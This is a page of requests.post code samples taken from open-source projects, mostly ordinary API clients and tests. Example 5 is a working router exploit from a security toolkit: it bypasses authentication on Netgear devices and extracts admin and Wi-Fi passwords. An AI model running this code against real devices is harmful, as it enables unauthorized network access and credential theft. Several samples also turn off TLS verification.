requests.post

Here are examples of the Python API requests.post, taken from open source projects. By voting up, you can indicate which examples are most useful and appropriate.

182 Examples
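
For reference, requests.post(url, data=None, json=None, **kwargs) sends an HTTP POST and returns a Response object. A minimal sketch before diving into the examples (the endpoint below is a placeholder):

import requests

# hypothetical endpoint, purely for illustration
response = requests.post("https://example.com/api/items",
                         data={"name": "widget"},  # form-encoded request body
                         timeout=10)               # seconds; avoids hanging forever
response.raise_for_status()                        # raise HTTPError on 4xx/5xx
print(response.json())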

Example 1

Project: Habitican-Curse Source File: request_manager.py
    def Flush(self):
        DEBUG.Display("Please Wait...")
        Drops = []

        # Difference obtained in user stats due to these operations
        origDict = {'hp': G.user.hp, 'gp': G.user.gp, 'mp': G.user.mp,
                    'exp': G.user.exp, 'lvl': G.user.lvl}
        diffDict = origDict.copy()

        # Habits marked as +
        for i in self.MarkUpQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "up"
            response = requests.post(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            json = response.json()
            for i in diffDict:
                diffDict[i] = json[i]

            # Check for drops
            tmp_var = json['_tmp']
            if tmp_var.has_key('drop'):
                if tmp_var['drop'].has_key('dialog'):
                    Drops+=[str(tmp_var['drop']['dialog'])]
                elif tmp_var['drop'].has_key('text'):
                    Drops+=[str(tmp_var['drop']['text'])]
                elif tmp_var['drop'].has_key('notes'):
                    Drops+=[str(tmp_var['drop']['notes'])]

        # Habits marked as -
        for i in self.MarkDownQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "down"
            response = requests.post(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            json = response.json()
            for i in diffDict:
                #diffDict[i] = U.Round(json[i]) - U.Round(origDict[i])
                diffDict[i] = json[i]

        # Dailies and TODOS marked as completed
        for i in self.MarkQueue:
            if i.task.task_type != "daily" or (not i.task.completed):
                URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "up"
            else:
                URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "down"
            response = requests.post(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            if i.task.task_type == "todo":
                G.TODOMenu.Remove(i.task.taskID)
            elif i.task.task_type == "daily":
                i.task.completed ^= True

            json = response.json()

            for i in diffDict:
                diffDict[i] = json[i]

            # Check for drops
            tmp_var = json['_tmp']
            if tmp_var.has_key('drop'):
                if tmp_var['drop'].has_key('dialog'):
                    Drops+=[str(tmp_var['drop']['dialog'])]
                elif tmp_var['drop'].has_key('text'):
                    Drops+=[str(tmp_var['drop']['text'])]
                elif tmp_var['drop'].has_key('notes'):
                    Drops+=[str(tmp_var['drop']['notes'])]

        for i in self.DeleteQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID
            response = requests.delete(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            if i.task.task_type == "habit":
                G.HabitMenu.Remove(i.task.taskID)
            elif i.task.task_type == "daily":
                G.DailyMenu.Remove(i.task.taskID)
            elif i.task.task_type == "todo":
                G.TODOMenu.Remove(i.task.taskID)

        for i in self.EditQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID
            response = requests.put(URL, headers=self.headers, json=i.task.data)

            # Need some error handling here
            if response.status_code!=200:
                return

        G.screen.Erase()
        G.user.PrintDiff(diffDict)
        G.intf.Init()
        G.user.PrintUserStats()

        # Display Drop Messages
        if Drops:
            G.screen.SaveInRegister(1)
            drop_items = []
            for i in Drops:
                drop_items += [M.SimpleTextItem(i)]

            dropMenu = M.SimpleTextMenu(drop_items, C.SCR_TEXT_AREA_LENGTH)
            dropMenu.SetXY(C.SCR_FIRST_HALF_LENGTH, 5) 
            dropMenu.Display()
            dropMenu.Input()
            G.screen.RestoreRegister(1)

        self.ClearQueues()
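
The "Need some error handling here" comments above mark a real gap: every non-200 response silently aborts the flush. A common alternative is to let requests raise, as in this minimal sketch (the URL and header are placeholders, not Habitica's actual API):

import requests

try:
    response = requests.post("https://habitica.example/api/tasks/123/up",  # hypothetical URL
                             headers={"x-api-key": "..."},                 # hypothetical header
                             timeout=10)
    response.raise_for_status()  # raises requests.exceptions.HTTPError on 4xx/5xx
except requests.exceptions.RequestException as exc:
    print("request failed: %s" % exc)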

Example 2

Project: redwind Source File: twitter.py
def handle_new_or_edit(post, preview, img, in_reply_to,
                       repost_of, like_of):
    if not is_twitter_authorized():
        current_app.logger.warn('current user is not authorized for twitter')
        return

    # check for RT's
    is_retweet = False
    if repost_of:
        repost_match = PERMALINK_RE.match(repost_of)
        if repost_match:
            is_retweet = True
            tweet_id = repost_match.group(2)
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/retweet/{}.json'
                .format(tweet_id),
                auth=get_auth())
            if result.status_code // 2 != 100:
                raise RuntimeError("{}: {}".format(result,
                                                   result.content))
    is_favorite = False
    if like_of:
        like_match = PERMALINK_RE.match(like_of)
        if like_match:
            is_favorite = True
            tweet_id = like_match.group(2)
            result = requests.post(
                'https://api.twitter.com/1.1/favorites/create.json',
                data={'id': tweet_id},
                auth=get_auth())
            if result.status_code // 2 != 100:
                raise RuntimeError("{}: {}".format(
                    result, result.content))
    if not is_retweet and not is_favorite:
        data = {}
        data['status'] = preview

        loc = (post.venue and post.venue.location) or post.location
        if loc:
            data['lat'] = str(loc.get('latitude'))
            data['long'] = str(loc.get('longitude'))

        if in_reply_to:
            reply_match = PERMALINK_RE.match(in_reply_to)
            if reply_match:
                data['in_reply_to_status_id'] = reply_match.group(2)

        current_app.logger.debug('publishing with data %r', json.dumps(data))
        if img:
            tempfile = download_image_to_temp(img)
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/update_with_media.json',
                data=data,
                files={'media[]': open(tempfile, 'rb')},
                auth=get_auth())

        else:
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/update.json',
                data=data, auth=get_auth())

        if result.status_code // 2 != 100:
            raise RuntimeError("status code: {}, headers: {}, body: {}"
                               .format(result.status_code, result.headers,
                                       result.content))

    result_json = result.json()
    current_app.logger.debug("response from twitter {}".format(
        json.dumps(result_json, indent=True)))
    twitter_url = 'https://twitter.com/{}/status/{}'.format(
        result_json.get('user', {}).get('screen_name'),
        result_json.get('id_str'))

    if not is_favorite:
        post.add_syndication_url(twitter_url)
    return twitter_url
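
One detail worth flagging: the update_with_media branch opens the temp file without ever closing it. When posting with files=, a context manager keeps the handle from leaking; a sketch under the same assumptions (placeholder filename):

import requests

with open("photo.jpg", "rb") as f:  # closed automatically, unlike the open() above
    result = requests.post("https://api.twitter.com/1.1/statuses/update_with_media.json",
                           data={"status": "caption"},
                           files={"media[]": f})  # multipart/form-data upload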

Example 3

Project: sondra Source File: test_requests.py
def test_method_returns():
    int_method_url = _url('simple-app/simple-documents.simple-int-return')
    none_method_url = _url('simple-app/simple-documents.simple-none-return')
    number_method_url = _url('simple-app/simple-documents.simple-number-return')
    str_method_url = _url('simple-app/simple-documents.simple-str-return')
    list_method_url = _url('simple-app/simple-documents.list-return')
    dict_method_url = _url('simple-app/simple-documents.dict-return')
    self_method_url = _url('simple-app/simple-documents.operates-on-self')
    
    int_rsp = requests.post(int_method_url)
    assert int_rsp.ok
    x = int_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], int)
    
    none_rsp = requests.post(none_method_url)
    assert none_rsp.ok
    
    number_rsp = requests.post(number_method_url)
    assert number_rsp.ok
    x = number_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], float)
    
    str_rsp = requests.post(str_method_url)
    assert str_rsp.ok
    x = str_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], str)
    
    dict_rsp = requests.post(dict_method_url)
    assert dict_rsp.ok
    x = dict_rsp.json()
    assert isinstance(x, dict)
    assert '_' not in x
    assert x == {
        'a': 0,
        'b': 1,
        'c': 2
    }

    list_rsp = requests.post(list_method_url)
    assert list_rsp.ok
    x = list_rsp.json()
    assert isinstance(x, list)
    assert x == ["0", "1", "2", "3"]
    
    self_rsp = requests.post(self_method_url)
    assert self_rsp.ok

Example 4

Project: silo.pub Source File: twitter.py
def publish(site):
    auth = OAuth1(
        client_key=current_app.config['TWITTER_CLIENT_KEY'],
        client_secret=current_app.config['TWITTER_CLIENT_SECRET'],
        resource_owner_key=site.account.token,
        resource_owner_secret=site.account.token_secret)

    def interpret_response(result):
        if result.status_code // 100 != 2:
            return util.wrap_silo_error_response(result)

        result_json = result.json()
        twitter_url = 'https://twitter.com/{}/status/{}'.format(
            result_json.get('user', {}).get('screen_name'),
            result_json.get('id_str'))
        return util.make_publish_success_response(twitter_url, result_json)

    def get_tweet_id(original):
        tweet_url = util.posse_post_discovery(original, TWEET_RE)
        if tweet_url:
            m = TWEET_RE.match(tweet_url)
            if m:
                return m.group(1), m.group(2)
        return None, None

    def upload_photo(photo):
        current_app.logger.debug('uploading photo, name=%s, type=%s',
                                 photo.filename, photo.content_type)
        result = requests.post(UPLOAD_MEDIA_URL, files={
            'media': (photo.filename, photo.stream, photo.content_type),
        }, auth=auth)
        if result.status_code // 100 != 2:
            return None, result
        result_data = result.json()
        current_app.logger.debug('upload result: %s', result_data)
        return result_data.get('media_id_string'), None

    def upload_video(video, default_content_type='video/mp4'):
        # chunked video upload
        chunk_files = []

        def cleanup():
            for f in chunk_files:
                os.unlink(f)

        chunk_size = 1 << 20
        total_size = 0
        while True:
            chunk = video.read(chunk_size)
            if not chunk:
                break
            total_size += len(chunk)

            tempfd, tempfn = tempfile.mkstemp('-%03d-%s' % (
                len(chunk_files), video.filename))
            with open(tempfn, 'wb') as f:
                f.write(chunk)
            chunk_files.append(tempfn)

        current_app.logger.debug('init upload. type=%s, length=%s',
                                 video.content_type, video.content_length)
        result = requests.post(UPLOAD_MEDIA_URL, data={
            'command': 'INIT',
            'media_type': video.content_type or default_content_type,
            'total_bytes': total_size,
        }, auth=auth)
        current_app.logger.debug('init result: %s %s', result, result.text)
        if result.status_code // 100 != 2:
            cleanup()
            return None, result
        result_data = result.json()
        media_id = result_data.get('media_id_string')
        segment_idx = 0

        for chunk_file in chunk_files:
            current_app.logger.debug('appending file: %s', chunk_file)
            result = requests.post(UPLOAD_MEDIA_URL, data={
                'command': 'APPEND',
                'media_id': media_id,
                'segment_index': segment_idx,
            }, files={
                'media': open(chunk_file, 'rb'),
            }, auth=auth)
            current_app.logger.debug(
                'append result: %s %s', result, result.text)
            if result.status_code // 100 != 2:
                cleanup()
                return None, result
            segment_idx += 1

        current_app.logger.debug('finalize uploading video: %s', media_id)
        result = requests.post(UPLOAD_MEDIA_URL, data={
            'command': 'FINALIZE',
            'media_id': media_id,
        }, auth=auth)
        current_app.logger.debug('finalize result: %s %s', result, result.text)
        if result.status_code // 100 != 2:
            cleanup()
            return None, result
        cleanup()
        return media_id, None

    data = {}
    format = brevity.FORMAT_NOTE
    content = request.form.get('content[value]') or request.form.get('content')

    if 'name' in request.form:
        format = brevity.FORMAT_ARTICLE
        content = request.form.get('name')

    repost_ofs = util.get_possible_array_value(request.form, 'repost-of')
    for repost_of in repost_ofs:
        _, tweet_id = get_tweet_id(repost_of)
        if tweet_id:
            return interpret_response(
                requests.post(RETWEET_STATUS_URL.format(tweet_id), auth=auth))
    else:
        if repost_ofs:
            content = 'Reposted: {}'.format(repost_ofs[0])

    like_ofs = util.get_possible_array_value(request.form, 'like-of')
    for like_of in like_ofs:
        _, tweet_id = get_tweet_id(like_of)
        if tweet_id:
            return interpret_response(
                requests.post(FAVE_STATUS_URL, data={'id': tweet_id}, auth=auth))
    else:
        if like_ofs:
            content = 'Liked: {}'.format(like_ofs[0])

    media_ids = []
    for photo in util.get_files_or_urls_as_file_storage(request.files, request.form, 'photo'):
        media_id, err = upload_photo(photo)
        if err:
            return util.wrap_silo_error_response(err)
        media_ids.append(media_id)

    for video in util.get_files_or_urls_as_file_storage(request.files, request.form, 'video'):
        media_id, err = upload_video(video)
        if err:
            return util.wrap_silo_error_response(err)
        media_ids.append(media_id)

    in_reply_tos = util.get_possible_array_value(request.form, 'in-reply-to')
    for in_reply_to in in_reply_tos:
        twitterer, tweet_id = get_tweet_id(in_reply_to)
        if tweet_id:
            data['in_reply_to_status_id'] = tweet_id
            if (twitterer != site.account.username and
                    '@' + twitterer.lower() not in content.lower()):
                content = '@{} {}'.format(twitterer, content)
            break
    else:
        if in_reply_tos:
            content = 'Re: {}, {}'.format(in_reply_tos[0], content)

    location = request.form.get('location')
    current_app.logger.debug('received location param: %s', location)
    data['lat'], data['long'] = util.parse_geo_uri(location)

    permalink_url = request.form.get('url')
    if media_ids:
        data['media_ids'] = ','.join(media_ids)

    if content:
        data['status'] = brevity.shorten(content, permalink=permalink_url,
                                         format=format)
    data = util.trim_nulls(data)
    current_app.logger.debug('publishing with params %s', data)
    return interpret_response(
        requests.post(CREATE_STATUS_URL, data=data, auth=auth))
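
The OAuth1 object used throughout this example is presumably requests_oauthlib's; it plugs into requests' auth= hook and signs each request per OAuth 1.0a. A minimal sketch with placeholder credentials:

import requests
from requests_oauthlib import OAuth1

auth = OAuth1(client_key="app-key", client_secret="app-secret",
              resource_owner_key="user-token", resource_owner_secret="user-secret")
result = requests.post("https://api.twitter.com/1.1/statuses/update.json",
                       data={"status": "hello"}, auth=auth)  # request signed transparently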

Example 5

Project: rext Source File: wndr_auth_bypass.py
    def do_run(self, e):
        url = "http://%s:%s/" % (self.host, self.port)

        # Headers with SOAP requests
        headers = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"}
        headers1 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo"}
        headers2 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo"}
        headers3 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys"}
        headers4 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice"}

        payload = {"": ""}  # Empty form will cause that the auth is bypassed

        # This is a very stupid way to parse XML but xml.etree is not playing nice with SOAP and
        # I don't feel like adding lxml into dependencies just for this module
        striptag = re.compile(r'<.*?>')
        try:
            print_yellow("Sending exploit")

            # Request DeviceInfo
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfo.xml")
            core.io.writetextfile(response.text, "DeviceInfo.xml")
            print_yellow("Parsing response")
            regex = re.search("<Description>(.*)", response.text)
            regex2 = re.search("<SerialNumber>(.*)", response.text)
            regex3 = re.search("<Firmwareversion>(.*)", response.text)
            try:
                description = striptag.sub('', regex.group(1))
                serial_number = striptag.sub('', regex2.group(1))
                firmware = striptag.sub('', regex3.group(1))
                print_green("Device: %s" % description)
                print_green("Serial number: %s" % serial_number)
                print_green("FW version: %s" % firmware)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request web UI password
            response = requests.post(url, headers=headers1, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to LANConfigSecurity.xml")
            core.io.writetextfile(response.text, "LANConfigSecurity.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewPassword>(.*)", response.text)
            try:
                password = striptag.sub('', regex.group(1))
                print_green("Password: %s" % password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request WLAN info
            response = requests.post(url, headers=headers2, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfiguration.xml")
            core.io.writetextfile(response.text, "WLANConfiguration.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewSSID>(.*)", response.text)
            regex2 = re.search("<NewBasicEncryptionModes>(.*)", response.text)
            try:
                ssid = regex.group(1)
                ssid = striptag.sub('', ssid)
                wlan_encryption = striptag.sub('', regex2.group(1))
                print_green("SSID: " + ssid)
                print_green("Encryption: %s" % wlan_encryption)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Wlan password
            response = requests.post(url, headers=headers3, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfigurationGetWPASecurityKeys.xml")
            core.io.writetextfile(response.text, "WLANConfigurationGetWPASecurityKeys.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewWPAPassphrase>(.*)", response.text)
            try:
                wlan_password = striptag.sub('', regex.group(1))
                print_green("Passphrase: %s" % wlan_password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Attached devices
            response = requests.post(url, headers=headers4, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfoGetAttachDevice.xml")
            core.io.writetextfile(response.text, "DeviceInfoGetAttachDevice.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewAttachDevice>(.*)", response.text)
            try:
                devices = striptag.sub('', regex.group(1))
                devices = devices.split('@')[1:]  # First element is number of records
                for device in devices:
                    device = device.split(";")
                    print_green("ID: %s" % device[0])
                    print_green("IP: %s" % device[1])
                    print_green("Name: %s" % device[2])
                    print_green("MAC: %s" % interface.utils.lookup_mac(device[3]))
                    print_green("Connection type: %s" % device[4])
            except IndexError:
                print_error("opps unable to locate this regular expression")

        except requests.ConnectionError as e:
            print_error("lost connection " + e)
        except requests.Timeout:
            print_error("timeout")

Example 6

Project: djoauth2 Source File: client_demo.py
def main():
  client_name = 'Example Client'
  client_key = 'be6f31235c6118273918c4c70f6768'
  client_secret = '89dcee4e6fe655377a19944c2bee9b'
  client_redirect_uri = 'http://localhost:1111/'
  client_auth_headers = {
    'Authorization': 'Basic {}'.format(
        b64encode('{}:{}'.format(client_key, client_secret)))
  }

  authorization_endpoint = 'http://localhost:8080/oauth2/authorization/'
  token_endpoint = 'http://localhost:8080/oauth2/token/'
  user_info_endpoint = 'http://localhost:8080/api/user_info/'

  scopes = ['user_info']
  scope_string = ' '.join(scopes)

  auth_url = '{}?scope={}&client_id={}&response_type=code'.format(
      authorization_endpoint,
      scope_string,
      client_key)

  print ''
  print 'Log in via the admin page (username: exampleuser, password: password)'
  print ''
  print 'http://localhost:8080/admin/'
  print ''
  raw_input('press return to continue...')

  print ''
  print 'Open the following URL in your browser:'
  print ''
  print auth_url
  print ''
  print 'Click the "Accept" button to grant this client access to your data. '
  print 'Your browser will be redirected to a URL with a "code" parameter; copy '
  print 'that value and paste it in below.'
  print ''

  auth_code = raw_input('code=').strip()

  # Exchange the authorization code for an access token.
  data = {
    'code': auth_code,
    'grant_type': 'authorization_code',
  }
  token_response = requests.post(
      token_endpoint,
      data=data,
      headers=client_auth_headers)
  assert_200(token_response)

  token_data = json.loads(token_response.content)
  print ''
  print 'Received access token information:'
  print '   access token:', token_data['access_token']
  print '  refresh token:', token_data.get('refresh_token', '')
  print '   lifetime (s):', token_data['expires_in']
  print ''
  raw_input('press return to continue...')


  # Exchange the refresh token for a new access token, if we received one.
  refresh_token = token_data.get('refresh_token')
  if refresh_token:
    data = {
      'refresh_token' : refresh_token,
      'grant_type' : 'refresh_token',
    }
    token_response = requests.post(
        token_endpoint,
        data=data,
        headers=client_auth_headers,
        verify=False)
    assert_200(token_response)
    token_data = json.loads(token_response.content)

    print ''
    print 'Exchanged refresh token for access token:'
    print '   access token:', token_data['access_token']
    print '  refresh token:', token_data.get('refresh_token', '')
    print '   lifetime (s):', token_data['expires_in']
    print ''
    raw_input('press return to continue...')

  # Make a failing API request, showing what happens when we don't include
  # authorization.

  failing_api_resp = requests.post(
    user_info_endpoint,
    headers={},
    data={},
    verify=False)

  try:
    assert_200(failing_api_resp)
  except ValueError as ve:
    print 'Unauthenticated API request failed as expected:'
    print ''
    print ve

  # Make an API request, authenticating with our recently received access token.
  api_resp = requests.post(
    user_info_endpoint,
    headers={
      'Authorization': 'Bearer {}'.format(token_data['access_token'])
    },
    data={},
    verify=False)

  assert_200(api_resp)

  print ''
  print 'Authenticated API request succeeded! Returned the following content:'
  print api_resp.content
  print ''
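
The client above assembles its Basic Authorization header by hand with b64encode; requests can do that encoding itself when given a (username, password) tuple via auth=. A sketch using the demo's own credentials:

import requests

token_response = requests.post("http://localhost:8080/oauth2/token/",
                               data={"code": "...", "grant_type": "authorization_code"},
                               auth=("be6f31235c6118273918c4c70f6768",   # client key
                                     "89dcee4e6fe655377a19944c2bee9b"))  # client secret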

Example 7

Project: maltrieve Source File: maltrieve.py
def upload_crits(response, md5, cfg):
    if response:
        url_tag = urlparse(response.url)
        mime_type = magic.from_buffer(response.content, mime=True)
        files = {'filedata': (md5, response.content)}
        headers = {'User-agent': 'Maltrieve'}
        zip_files = ['application/zip', 'application/gzip', 'application/x-7z-compressed']
        rar_files = ['application/x-rar-compressed']
        inserted_domain = False
        inserted_sample = False

        # submit domain / IP
        # TODO: identify if it is a domain or IP and submit accordingly
        url = "{srv}/api/v1/domains/".format(srv=cfg.crits)
        domain_data = {
            'api_key': cfg.crits_key,
            'username': cfg.crits_user,
            'source': cfg.crits_source,
            'domain': url_tag.netloc
        }
        try:
            # Note that this request does NOT go through proxies
            logging.debug("Domain submission: %s|%r", url, domain_data)
            domain_response = requests.post(url, headers=headers, data=domain_data, verify=False)
            # pylint says "Instance of LookupDict has no 'ok' member" but it's wrong, I checked
            if domain_response.status_code == requests.codes.ok:
                domain_response_data = domain_response.json()
                if domain_response_data['return_code'] == 0:
                    inserted_domain = True
                else:
                    logging.info("Submitted domain info %s for %s to CRITs, response was %s",
                                 domain_data['domain'], md5, domain_response_data)
            else:
                logging.info("Submission of %s failed: %d", url, domain_response.status_code)
        except requests.exceptions.ConnectionError:
            logging.info("Could not connect to CRITs when submitting domain %s", domain_data['domain'])
        except requests.exceptions.HTTPError:
            logging.info("HTTP error when submitting domain %s to CRITs", domain_data['domain'])

        # Submit sample
        url = "{srv}/api/v1/samples/".format(srv=cfg.crits)
        if mime_type in zip_files:
            file_type = 'zip'
        elif mime_type in rar_files:
            file_type = 'rar'
        else:
            file_type = 'raw'
        sample_data = {
            'api_key': cfg.crits_key,
            'username': cfg.crits_user,
            'source': cfg.crits_source,
            'upload_type': 'file',
            'md5': md5,
            'file_format': file_type  # must be type zip, rar, or raw
        }
        try:
            # Note that this request does NOT go through proxies
            sample_response = requests.post(url, headers=headers, files=files, data=sample_data, verify=False)
            # pylint says "Instance of LookupDict has no 'ok' member" but it's wrong, I checked
            if sample_response.status_code == requests.codes.ok:
                sample_response_data = sample_response.json()
                if sample_response_data['return_code'] == 0:
                    inserted_sample = True
                else:
                    logging.info("Submitted sample %s to CRITs, response was %r", md5, sample_response_data)
            else:
                logging.info("Submission of sample %s failed: %d}", md5, sample_response.status_code)
        except requests.exceptions.ConnectionError:
            logging.info("Could not connect to CRITs when submitting sample %s", md5)
        except requests.exceptions.HTTPError:
            logging.info("HTTP error when submitting sample %s to CRITs", md5)

        # Create a relationship for the sample and domain
        url = "{srv}/api/v1/relationships/".format(srv=cfg.crits)
        if (inserted_sample and inserted_domain):
            relationship_data = {
                'api_key': cfg.crits_key,
                'username': cfg.crits_user,
                'source': cfg.crits_source,
                'right_type': domain_response_data['type'],
                'right_id': domain_response_data['id'],
                'left_type': sample_response_data['type'],
                'left_id': sample_response_data['id'],
                'rel_type': 'Downloaded_From',
                'rel_confidence': 'high',
                'rel_date': datetime.datetime.now()
            }
            try:
                # Note that this request does NOT go through proxies
                relationship_response = requests.post(url, headers=headers, data=relationship_data, verify=False)
                # pylint says "Instance of LookupDict has no 'ok' member"
                if relationship_response.status_code != requests.codes.ok:
                    logging.info("Submitted relationship info for %s to CRITs, response was %r",
                                 md5, domain_response_data)
            except requests.exceptions.ConnectionError:
                logging.info("Could not connect to CRITs when submitting relationship for sample %s", md5)
            except requests.exceptions.HTTPError:
                logging.info("HTTP error when submitting relationship for sample %s to CRITs", md5)
                return True
        else:
            return False
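
Every CRITs call above passes verify=False, which skips TLS certificate validation and makes urllib3 emit an InsecureRequestWarning per request. If the server really must be reached insecurely, the warning can be silenced; pointing verify= at the server's CA bundle is the safer fix. A hedged sketch (the URL is a placeholder):

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.post("https://crits.example/api/v1/domains/",  # hypothetical server
                         data={"domain": "example.com"}, verify=False)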

Example 8

Project: sondra Source File: test_requests.py
def test_document_method():
    simple_documents = _url('simple-app/simple-documents')
    added_document_1 = {
        "name": "Added Document 1",
        "date": datetime.utcnow().isoformat(),
    }
    # add an item to the collection
    post = requests.post(simple_documents, data=json.dumps(added_document_1))
    assert post.ok

    test_method_url = _url('simple-app/simple-documents/added-document-1.arg-test')

    schema_url = test_method_url + ';schema'
    schema = requests.get(schema_url)
    assert schema.ok
    schema = schema.json()
    assert isinstance(schema, dict)
    assert 'definitions' in schema
    assert 'method_request' in schema['definitions']
    assert 'method_response' in schema['definitions']
    assert 'id' in schema
    assert schema['id'] == schema_url

    help_url = test_method_url + ';help'
    help = requests.get(help_url)
    assert help.ok
    assert help.text

    args = json.dumps({
        'int_arg': 10,
        'str_arg': "string",
        'list_arg': ['list'],
        'dict_arg': {'key': 'value'}
    })

    json_url = test_method_url + ';json'
    get_noargs = requests.get(json_url)
    get_args = requests.get(json_url, params={'q': args})

    post_noargs = requests.post(json_url)
    post_args = requests.post(json_url, data=args)

    assert get_noargs.ok
    assert get_noargs.json()
    assert get_args.ok
    assert get_args.json()
    assert post_args.ok
    assert post_args.json()
    assert get_args.json() == post_args.json()
    assert get_noargs.json() == post_noargs.json()
    assert post_args.json() == [{"one": 1}, 0, 2]
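
Like several examples on this page, the test sends JSON with data=json.dumps(...). Since requests 2.4.2 the json= keyword serializes the payload and sets Content-Type: application/json in one step; a minimal sketch (placeholder URL):

import requests

post = requests.post("http://localhost:5000/simple-app/simple-documents",  # hypothetical URL
                     json={"name": "Added Document 1"})  # serialized and content-typed for you
assert post.ok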

Example 9

Project: maltego_censys Source File: censys_issuer_cn_to_sha1.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    cn = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.issuer.common_name.raw: {cn}'.format(cn=cn), 'fields':
             ['443.https.tls.certificate.parsed.fingerprint_sha1', '443.https.tls.certificate.parsed.issuer_dn',
              '443.https.tls.certificate.parsed.subject_dn', 'updated_at', ], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if 1 < pages < 5:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")

            else:
                mt.addUIMessage("No additional cert data was found with this ssl cert subject cn: {cn}".format(cn=cn))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 10

Project: ocdev Source File: appstore.py
    def run(self, arguments, directory, settings):
        url = settings.get_value('appstore', 'url').rstrip('/')
        user = settings.get_value('appstore', 'user')
        password = settings.get_value('appstore', 'password')
        archive_dir = arguments.archive
        app_name = basename(archive_dir).split('.')[0]

        # parse the appinfo/info.xml from the archive to fill in stuff required
        # for the release
        archive = tar_open(archive_dir)

        # TODO: we need app validation like:
        # * name of the folder is the same as the id in info.xml
        # * no private api usage
        # * all needed fields for info.xml present
        # * size not bigger than allowed to upload
        info_xml = archive.extractfile(
            dict(zip(
                archive.getnames(),
                archive.getmembers()
            ))['%s/appinfo/info.xml' % app_name]
        )

        parser = InfoParser()
        result = parser.parse(info_xml.read())

        # no ocsid present means not yet in the appstore so let's upload it
        params = {
            'name': result['name'],
            'type': result['category'],
            'depend': result['requiremin'],
            'downloadtype1': 0,
            'licensetype': result['licence'],
            'version': result['version']
        }

        if result['homepage'] != '':
            params['homepage'] = result['homepage']
            params['homepagetype'] = 'Homepage'
        if result['repository'] != '':
            params['homepage2'] = result['repository']
